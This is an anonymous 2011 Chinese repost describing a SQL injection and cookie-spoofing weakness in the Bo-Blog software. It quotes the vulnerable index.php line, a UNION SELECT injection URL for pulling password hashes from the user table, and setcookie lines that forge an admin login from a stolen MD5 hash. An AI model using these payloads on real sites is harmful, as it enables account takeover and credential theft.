天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧软件 >> 正文

boblog注入后COOKIE欺骗漏洞

2011-3-7不详佚名

影响版本:boblog最新
    官方网站:http://www.bo-blog.com//
    漏洞类型:COOKIE欺骗
    漏洞描述:
    代码
    index.php代码
    if ($go) @list($job, $itemid)=@explode('_', basename($go));
    原本注入语句为 index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
    也就是 经过explode处理后 假如数据库为boblog_user 最终只会成为 boblog
    更何况 存在注入漏洞的
    `category` in ({$all_needed_cates})");
    不会因为#符号而注析掉后面的东西 只会变成from boblog_user#) PS:可能因为这里我不会绕过
    COOKIES欺骗漏洞很简单
    假如某牛真的注入成功得到MD5密码不用去跑MD5了
    直接
    setcookie ('userid', '1',);
    setcookie ('userpsw', 'md5密文', );
    既可了……

本文来源:不详 作者:佚名

声明
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。文章是出于传递更多信息之目的。若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。 Email:support@txwb.com,系统开号,技术支持,服务联系微信:_WX_1_本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行